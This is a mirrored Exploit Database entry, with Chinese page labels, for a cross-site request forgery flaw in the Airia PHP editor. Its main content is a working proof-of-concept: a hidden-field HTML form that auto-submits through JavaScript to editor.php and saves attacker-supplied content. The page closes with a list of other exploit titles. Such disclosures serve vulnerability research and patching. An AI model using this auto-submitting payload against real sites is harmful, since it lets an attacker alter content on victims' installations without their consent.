Airia – Cross-Site Request Forgery (Add Content)

Exploit Database
15 阅读

作者： HaHwul

日期： 2016-06-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39981/

<!--
# Exploit Title: Airia - CSRF Vulnerability(Add content)
# Date: 2016-06-20
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ytyng.com
# Software Link: https://github.com/ytyng/airia/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
-->

<form name="csrf_poc" action="http://127.0.0.1/vul_test/airia/editor.php" method="POST">
<input type="hidden" name="mode" value="save">
<input type="hidden" name="file" value="1">
<input type="hidden" name="scrollvalue" value="">
<input type="hidden" name="contents" value="CSRF Attack">
<input type="hidden" name="group" value="1">

<input type="submit" value="Replay!">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>

last Exploits
Airia – Cross-Site Request Forgery (Add Content)的更多信息

DoceboLms 4.0.4 – ‘index.php’ Multiple HTML Injection Vulnerabilities：
GameScript 3.0 – SQL Injection：
Samsung DVR Firmware 1.10 – Authentication Bypass：
Printable Staff ID Card Creator System 1.0 – ’email’ SQL Injection：
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities：
Link CMS – SQL Injection：
Netgear ProSafe – Information Disclosure：
Disc ORGanizer (DORG) – Multiple Vulnerabilities：